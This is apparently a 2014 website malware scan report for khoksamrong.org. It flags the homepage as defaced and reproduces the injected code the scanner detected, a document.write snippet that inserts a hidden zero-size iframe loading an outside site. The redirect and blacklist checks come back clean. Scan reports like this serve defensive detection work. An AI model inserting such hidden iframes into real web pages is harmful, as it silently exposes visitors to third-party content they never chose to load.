Scanned pages/files
Request | Server response | Status |
http://khoksamrong.org/ | 200 OK Content-Length: 5161 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> Deface/Content modification. The following signature was found: Hacked By MEHR@N BBC ( Best Boy of City ) <html><head><meta http-equiv="content-type" content="text/html; charset=windows-1252"><title>Hacked By MEHR@N BBC ( Best Boy of City )</title>
</head><body bgcolor="black"><p></p><style>BODY {PADDING-RIGHT: 5px; PADDING-LEFT: 5px; SCROLLBAR-FACE-COLOR: #000000; BACKGROUND: #000000; PADDING-BOTTOM: 5px; MARGIN: 0px; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #00c000; SCROLLBAR-3DLIGHT-COLOR: #00c000; ...[5747 bytes skipped]... | ||
http://khoksamrong.org/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 424 Content-Type: text/html | clean |
http://khoksamrong.org/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: khoksamrong.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 24 Sep 2014 16:18:29 GMT
Accept-Ranges: bytes
ETag: "e6de7-1429-4f3b94ef4ad80"
Server: nginx
Vary: Accept-Encoding,User-Agent
Content-Length: 5161
Content-Type: text/html
Last-Modified: Mon, 03 Mar 2014 20:05:26 GMT
...5161 bytes of data.
GET / HTTP/1.1
Host: khoksamrong.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 24 Sep 2014 16:18:29 GMT
Accept-Ranges: bytes
ETag: "e6de7-1429-4f3b94ef4ad80"
Server: nginx
Vary: Accept-Encoding,User-Agent
Content-Length: 5161
Content-Type: text/html
Last-Modified: Mon, 03 Mar 2014 20:05:26 GMT
...5161 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: khoksamrong.org
Referer: http://www.google.com/search?q=khoksamrong.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: khoksamrong.org
Referer: http://www.google.com/search?q=khoksamrong.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=khoksamrong.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://khoksamrong.org/
Result: khoksamrong.org is not infected or malware details are not published yet.
Result: khoksamrong.org is not infected or malware details are not published yet.